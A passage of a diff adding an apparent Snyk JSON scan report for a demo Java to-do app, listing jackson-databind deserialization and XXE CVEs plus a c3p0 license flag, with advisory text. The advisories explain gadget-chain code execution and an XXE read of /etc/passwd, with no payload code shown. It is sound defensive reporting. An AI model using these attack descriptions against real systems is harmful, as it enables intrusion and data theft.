"packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + 
{ + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": 
"primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + 
"cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. 
By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + 
"functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": 
"SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-11T09:50:57.453912Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to 